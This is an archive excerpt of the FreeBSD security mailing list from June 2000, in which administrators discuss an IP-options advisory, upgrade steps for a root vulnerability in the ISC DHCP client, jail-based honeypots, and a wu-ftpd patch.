freebsd-security@freebsd.org Received: from sn1oexchr01.nextvenue.com (sn1oexchr01.nextvenue.com [63.209.169.9]) by hub.freebsd.org (Postfix) with SMTP id 74E4337B640 for ; Sat, 24 Jun 2000 12:15:46 -0700 (PDT) (envelope-from nevans@nextvenue.com) Received: FROM sn1exchmbx.nextvenue.com BY sn1oexchr01.nextvenue.com ; Sat Jun 24 15:12:04 2000 -0400 Received: by SN1EXCHMBX with Internet Mail Service (5.5.2650.21) id ; Sat, 24 Jun 2000 15:11:59 -0400 Message-ID: <712384017032D411AD7B0001023D799B07C8D7@SN1EXCHMBX> From: Nick Evans To: "'Herbert J. McNew'" Cc: "'freebsd-security@freebsd.org'" Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options Date: Sat, 24 Jun 2000 15:11:59 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01BFDE10.122634C0" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01BFDE10.122634C0 Content-Type: text/plain; charset="iso-8859-1" You might be able to use Nemesis to regenerate these types of packets: http://celerity.bartoli.org/nemesis/ Nick -----Original Message----- From: Herbert J. McNew [mailto:herb@cais.net] Sent: Friday, June 23, 2000 12:39 PM To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options Maybe I missed it, but does anyone have an exploit for this yet? I have a solution (that isn's a kernel recompile) that I'd like to test, but have no way of doing so without an exploit. Thanks. _____________________ Herb McNew Systems Administrator CAIS Internet (703) 247-6270 herb@cais.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message ------_=_NextPart_001_01BFDE10.122634C0 Content-Type: text/html; charset="iso-8859-1" RE: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options

You might be able to use Nemesis to regenerate these types of packets:

http://celerity.bartoli.org/nemesis/

Nick

-----Original Message-----
From: Herbert J. McNew [mailto:herb@cais.net]
Sent: Friday, June 23, 2000 12:39 PM
To: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options


Maybe I missed it, but does anyone have an exploit for this yet?  I have a
solution (that isn's a kernel recompile) that I'd like to test, but have
no way of doing so without an exploit.

Thanks.

_____________________
Herb McNew
Systems Administrator
CAIS Internet
(703) 247-6270
herb@cais.net




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

------_=_NextPart_001_01BFDE10.122634C0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 12:42:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 5E14437BBBC for ; Sat, 24 Jun 2000 12:42:36 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA28206 for ; Sat, 24 Jun 2000 12:42:25 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28204; Sat Jun 24 12:42:21 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id MAA12864 for ; Sat, 24 Jun 2000 12:42:21 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdq12862; Sat Jun 24 12:41:56 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.2/8.9.1) id e5OJfu956111 for ; Sat, 24 Jun 2000 12:41:56 -0700 (PDT) Message-Id: <200006241941.e5OJfu956111@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdJ56107; Sat Jun 24 12:41:35 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: freebsd-security@freebsd.org Subject: Possible root exploit in ISC DHCP client. (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 24 Jun 2000 12:41:34 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A quick fix to this problem, until dhclient in the base CVS tree can be patched is as follows: 1. Rename or remove /usr/src/contrib/isc-dhcp 2. fetch dhcp-2.0pl1.tar.gz and extract it into /usr/src/contrib 3. cd /usr/src/contrib && ln -s dhcp-2.0pl1 isc-dhcp 4. cd /usr/src/sbin/dhclient && make && make install clean 5. restart dhclient or reboot It would probably be a good idea to update the isc-dhcp2 and isc-dhcp3 ports. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [audit trail deleted] Approved-By: aleph1@SECURITYFOCUS.COM Message-ID: <200006240928.CAA06592@grosse.bisbee.fugue.com> Date: Sat, 24 Jun 2000 02:28:58 -0700 Reply-To: Ted Lemon Sender: Bugtraq List From: Ted Lemon Subject: Possible root exploit in ISC DHCP client. To: BUGTRAQ@SECURITYFOCUS.COM Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Sat, 24 Jun 2000 12:15:21 -0700 Resent-From: Cy Schubert Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP client. This exploit is present in all versions of the ISC DHCP client prior to 2.0pl1 and 3.0b1pl14, which I just released this evening. Anybody who is using versions of the ISC DHCP client other than these is strongly urged to upgrade. I would appreciate it if the OpenBSD people would take a look at the new version to see if they believe it is a complete fix, and let me know if it isn't. In any case, thanks for catching the error! I'm sorry I'm being so vague about how this got found, but I don't have time to read bugtraq anymore, so I was notified roughly fourth-hand. The ISC DHCP distribution is available at ftp://ftp.isc.org/isc/DHCP, and anonymous CVS at http://www.isc.org/products/DHCP/anoncvs.html. The head of the tree in anonymous CVS also contains the fix. _MelloN_ ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 12:57:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from merlin.prod.itd.earthlink.net (merlin.prod.itd.earthlink.net [207.217.120.156]) by hub.freebsd.org (Postfix) with ESMTP id 9F49E37B730 for ; Sat, 24 Jun 2000 12:57:18 -0700 (PDT) (envelope-from cjc@earthlink.net) Received: from dialin-client.earthlink.net (pool0860.cvx20-bradley.dialup.earthlink.net [209.179.253.95]) by merlin.prod.itd.earthlink.net (8.9.3-EL_1_3/8.9.3) with ESMTP id MAA12219 for ; Sat, 24 Jun 2000 12:57:08 -0700 (PDT) Received: (from cjc@localhost) by dialin-client.earthlink.net (8.9.3/8.9.3) id MAA00335 for freebsd-security@freebsd.org; Sat, 24 Jun 2000 12:55:41 -0700 (PDT) Date: Sat, 24 Jun 2000 12:55:40 -0700 From: "Crist J. Clark" To: freebsd-security@freebsd.org Subject: jail(8) Honeypots Message-ID: <20000624125540.A256@dialin-client.earthlink.net> Reply-To: cjclark@alum.mit.edu Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I searched the mail archive and read the jail(8) manpage and was surprised not to see any discussion of using jail for a honeypot, an IDS. If I understand things correctly, one of the primary motivations for the jail command is to isolate potentially exploitable daemons and other programs so any damage done by an attacker is minimized. It seems to me that it is such a logical extension to run a _known_ exploitable process in a jail then watch for and document attacks from outside that some people out there must be doing it. So, is anyone out there doing this? Have any hints, gotchas, or really cool ideas to share about setting a system like this up? It seems that there are lots of possiblilities. One good box could look like multiple machines running the same or different exploitable programs to an attacker. If no one out there is, I am going to give it a shot anyway. I'd still appreciate any ideas. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 18:48:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from camus.cybercable.fr (camus.cybercable.fr [212.198.0.200]) by hub.freebsd.org (Postfix) with SMTP id EBDE737BD1F for ; Sat, 24 Jun 2000 18:48:03 -0700 (PDT) (envelope-from root@gits.dyndns.org) Received: (qmail 2718519 invoked from network); 25 Jun 2000 01:48:01 -0000 Received: from r224m65.cybercable.tm.fr (HELO gits.dyndns.org) ([195.132.224.65]) (envelope-sender ) by camus.cybercable.fr (qmail-ldap-1.03) with SMTP for ; 25 Jun 2000 01:48:01 -0000 Received: (from root@localhost) by gits.dyndns.org (8.9.3/8.9.3) id DAA54039; Sun, 25 Jun 2000 03:48:00 +0200 (CEST) (envelope-from root) Posted-Date: Sun, 25 Jun 2000 03:48:00 +0200 (CEST) To: security@FreeBSD.ORG Subject: Re: Possible root exploit in ISC DHCP client. (fwd) References: <200006241941.e5OJfu956111@cwsys.cwsent.com> Reply-To: clefevre@citeweb.net X-Face: V|+c;4!|B?E%BE^{E6);aI.[<97Zd*>^#%Y5Cxv;%Y[PT-LW3;A:fRrJ8+^k"e7@+30g0YD0*^^3jgyShN7o?a]C la*Zv'5NA,=963bM%J^o]C From: Cyrille Lefevre Date: 25 Jun 2000 03:47:59 +0200 In-Reply-To: Cy Schubert - ITSD Open Systems Group's message of "Sat, 24 Jun 2000 12:41:34 -0700" Message-ID: Lines: 20 X-Mailer: Gnus v5.6.45/XEmacs 21.1 - "Canyonlands" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy Schubert - ITSD Open Systems Group writes: > A quick fix to this problem, until dhclient in the base CVS tree can be > patched is as follows: > > 1. Rename or remove /usr/src/contrib/isc-dhcp > 2. fetch dhcp-2.0pl1.tar.gz and extract it into /usr/src/contrib > 3. cd /usr/src/contrib && ln -s dhcp-2.0pl1 isc-dhcp > 4. cd /usr/src/sbin/dhclient && make && make install clean > 5. restart dhclient or reboot > > It would probably be a good idea to update the isc-dhcp2 and isc-dhcp3 > ports. http://www.freebsd.org/cgi/query-pr.cgi?pr=19493 Cyrille. -- home:mailto:clefevre@no-spam.citeweb.net Supprimer "no-spam." pour me repondre. work:mailto:Cyrille.Lefevre@no-spam.edf.fr Remove "no-spam." to answer me back. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 19: 8:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id F0B8437B560 for ; Sat, 24 Jun 2000 19:08:23 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id TAA28829; Sat, 24 Jun 2000 19:07:37 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28827; Sat Jun 24 19:07:27 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id TAA13901; Sat, 24 Jun 2000 19:07:27 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdo13899; Sat Jun 24 19:07:01 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.2/8.9.1) id e5P270a62238; Sat, 24 Jun 2000 19:07:00 -0700 (PDT) Message-Id: <200006250207.e5P270a62238@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdi62234; Sat Jun 24 19:06:30 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: clefevre@citeweb.net Cc: security@FreeBSD.ORG Subject: Re: Possible root exploit in ISC DHCP client. (fwd) In-reply-to: Your message of "25 Jun 2000 03:47:59 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 24 Jun 2000 19:06:29 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Cyrille Lefevre writes: > Cy Schubert - ITSD Open Systems Group writes: > > > A quick fix to this problem, until dhclient in the base CVS tree can be > > patched is as follows: > > > > 1. Rename or remove /usr/src/contrib/isc-dhcp > > 2. fetch dhcp-2.0pl1.tar.gz and extract it into /usr/src/contrib > > 3. cd /usr/src/contrib && ln -s dhcp-2.0pl1 isc-dhcp > > 4. cd /usr/src/sbin/dhclient && make && make install clean > > 5. restart dhclient or reboot > > > > It would probably be a good idea to update the isc-dhcp2 and isc-dhcp3 > > ports. > > http://www.freebsd.org/cgi/query-pr.cgi?pr=19493 I suppose I ought to submit a PR for the base isc-dhcp too. It'll be submitted tomorrow morning PDT. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 23:13:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rookie.org (mail.rookie.org [212.43.72.181]) by hub.freebsd.org (Postfix) with ESMTP id 537B437B531 for ; Sat, 24 Jun 2000 23:13:13 -0700 (PDT) (envelope-from dfens@rookie.org) Received: by mail.rookie.org (Postfix, from userid 1000) id 7728BF805; Sun, 25 Jun 2000 07:20:49 +0200 (CEST) Date: Sun, 25 Jun 2000 07:20:49 +0200 From: Stephan Holtwisch To: freebsd-security@freebsd.org Subject: Re: jail(8) Honeypots Message-ID: <20000625072049.A48985@rookie.org> References: <20000624125540.A256@dialin-client.earthlink.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20000624125540.A256@dialin-client.earthlink.net>; from cristjc@earthlink.net on Sat, Jun 24, 2000 at 12:55:40PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, On Sat, Jun 24, 2000 at 12:55:40PM -0700, Crist J. Clark wrote: > I searched the mail archive and read the jail(8) manpage and was > surprised not to see any discussion of using jail for a honeypot, > an IDS. If I understand things correctly, one of the primary > motivations for the jail command is to isolate potentially exploitable > daemons and other programs so any damage done by an attacker is > minimized. It seems to me that it is such a logical extension to run a > _known_ exploitable process in a jail then watch for and document > attacks from outside that some people out there must be doing it. > > So, is anyone out there doing this? Have any hints, gotchas, or really > cool ideas to share about setting a system like this up? It seems that > there are lots of possiblilities. One good box could look like > multiple machines running the same or different exploitable programs > to an attacker. > > If no one out there is, I am going to give it a shot anyway. I'd still > appreciate any ideas. I do not know the jail implementation in FreeBSD too well. However, to me it seems a very bad idea to run _known_ vulnerable software within a jail, since that would mean the jail implemenation must not have bugs. You wouldn't run buggy software in a chrooted environment either, would you ? In addition to this i don't see a real sense to run a 'victim' Host as an IDS, where is the purpose of that ? It may be fun to watch people trying to mess up your system, but most likely you will just catch lots of script kiddies. Stephan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 23:35: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from kestrel.prod.itd.earthlink.net (kestrel.prod.itd.earthlink.net [207.217.121.155]) by hub.freebsd.org (Postfix) with ESMTP id 19F4137B588 for ; Sat, 24 Jun 2000 23:35:05 -0700 (PDT) (envelope-from cjc@earthlink.net) Received: from dialin-client.earthlink.net (pool0874.cvx20-bradley.dialup.earthlink.net [209.179.253.109]) by kestrel.prod.itd.earthlink.net (8.9.3-EL_1_3/8.9.3) with ESMTP id XAA22293; Sat, 24 Jun 2000 23:34:54 -0700 (PDT) Received: (from cjc@localhost) by dialin-client.earthlink.net (8.9.3/8.9.3) id XAA00473; Sat, 24 Jun 2000 23:33:24 -0700 (PDT) Date: Sat, 24 Jun 2000 23:32:52 -0700 From: "Crist J. Clark" To: Stephan Holtwisch Cc: freebsd-security@FreeBSD.ORG Subject: Re: jail(8) Honeypots Message-ID: <20000624233252.B181@dialin-client.earthlink.net> Reply-To: cjclark@alum.mit.edu References: <20000624125540.A256@dialin-client.earthlink.net> <20000625072049.A48985@rookie.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000625072049.A48985@rookie.org>; from sh@rookie.org on Sun, Jun 25, 2000 at 07:20:49AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Jun 25, 2000 at 07:20:49AM +0200, Stephan Holtwisch wrote: [snip] > I do not know the jail implementation in FreeBSD too well. > However, to me it seems a very bad idea to run _known_ vulnerable > software within a jail, since that would mean the jail > implemenation must not have bugs. AFAIK, there is know known method to get out of a FreeBSD jail. There are always risks of exploits in any software. > You wouldn't run buggy > software in a chrooted environment either, would you ? No, there are known ways for root to escape a chroot'ed environment. > In addition to this i don't see a real sense to run a 'victim' > Host as an IDS, where is the purpose of that ? > It may be fun to watch people trying to mess up your system, > but most likely you will just catch lots of script kiddies. I would not run it naked on the Internet, but behind a firewall. You can see if people are managing to circumvent your firewall, or more likely, you might find people on your protected networks doing things they should not be. Honeypots are not a new idea. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 23:40:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 8361937B5B4 for ; Sat, 24 Jun 2000 23:40:50 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 24524 invoked by uid 1000); 25 Jun 2000 06:40:47 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2000 06:40:47 -0000 Date: Sun, 25 Jun 2000 01:40:47 -0500 (CDT) From: Mike Silbersack To: Koga Youichirou Cc: wollman@khavrinen.lcs.mit.edu, freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <20000624013253.13473.qmail@smtp.246.ne.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 24 Jun 2000, Koga Youichirou wrote: > Garrett Wollman : > > Here's a patch (mangled by cut&paste) which hacks around the problem. > > Debian team has already released a fixed package. > A patch is available from: > > http://security.debian.org/dists/potato/updates/main/source/wu-ftpd_2.6.0-5.1.diff.gz > > Then I checked it and I found that there are some other undesirable > codes in ftpd.c. Probably these codes do not lead to security flaw, > but I think that they should be corrected. I'm sure that's what the people who fixed the last set of bugs in wuftpd said when they came upon the bugs which comprise the current vuln. (But decided not to fix them.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message